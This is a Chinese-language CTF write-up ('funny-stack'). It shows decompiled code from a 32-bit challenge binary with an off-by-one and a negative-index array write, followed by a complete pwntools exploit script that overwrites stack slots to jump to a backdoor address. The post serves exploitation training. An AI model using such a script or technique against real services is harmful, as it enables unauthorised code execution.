0%

funny-stack

Posted on Edited on In , , , Views: Valine:
Symbols count in article: 2.9k Reading time ≈ 3 mins.

有趣的栈题目

题目1

main函数

1
2
3
4
5
6
int __cdecl main(int argc, const char **argv, const char **envp)
{
  sub_80486EC();
  sub_80485E7();
  return 0;
}

子函数

1
2
3
4
5
6
7
8
9
10
int sub_80486EC()
{
  char v1; // [esp+1Fh] [ebp-9h]

  puts("Enter your name ");
  fflush(stdout);
  __isoc99_scanf("%9s", &v1);
  printf("Welcome %s to participate the 429 ctf!\n", &v1);
  return fflush(stdout);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
int sub_80485E7()
{
  int v1; // [esp+10h] [ebp-48h]
  int v2; // [esp+14h] [ebp-44h]
  int v3; // [esp+18h] [ebp-40h]
  int j; // [esp+1Ch] [ebp-3Ch]
  int i; // [esp+20h] [ebp-38h]
  int s[13]; // [esp+24h] [ebp-34h]

  memset(s, 0, 0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    puts("enter index");
    fflush(stdout);
    __isoc99_scanf("%d", &v1);
    puts("enter value");
    fflush(stdout);
    __isoc99_scanf("%d", &v2);
    if ( v1 > 9 )
      exit(0);
    s[v1] = v2;
  }
  puts("your input");
  v3 = fflush(stdout);
  for ( j = 0; j <= 9; ++j )
  {
    printf("%d ", s[j]);
    v3 = fflush(stdout);
  }
  return v3;
}

看上去流程挺简单的,开头有个off-by-one,接下来一个负数修改,思路大概就是降低第二个函数的栈帧,然后通过负数修改i,修改次数,在修改地址

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '127.0.0.1' 
port = 10000
context.log_level = 'debug'
exe = './pwn1'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)

uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda name,data       : io.success(name + ": 0x%x" % data)

# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

def pack_addr(i, addr):
    sla("enter index\n", str(i))
    sla("enter value\n", str(addr))

def exp():
    """
    gdb.attach(io, '''
               b *0x080486ea
               c
               c
               ''')
    """
    sa("Enter your name \n", "c"*0x9)
    num = -44
    backdoor = 0x0804875D
    puts_plt = elf.plt['puts']
    __libc_start_main_got = elf.got['__libc_start_main']
    addr = 0x80485E7
    pack_addr(-1, -34)
    for i in range(0, 43):
        pack_addr(num+i, backdoor)
    ru("0 0 0 0 0 0 0 0 0 0 ")
    r()
    #pack_addr(num+0xb, puts_plt)
    #pack_addr(num+0xc, main_addr)
    #pack_addr(num+0xd, __libc_start_main)

if __name__ == '__main__':
    while True:
        try:
            exp()
            io.interactive()
            break
        except Exception as e:
            print(e)
            io.close()
            io = process(exe)

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/d70e4493/
版权声明:转载请注明出处!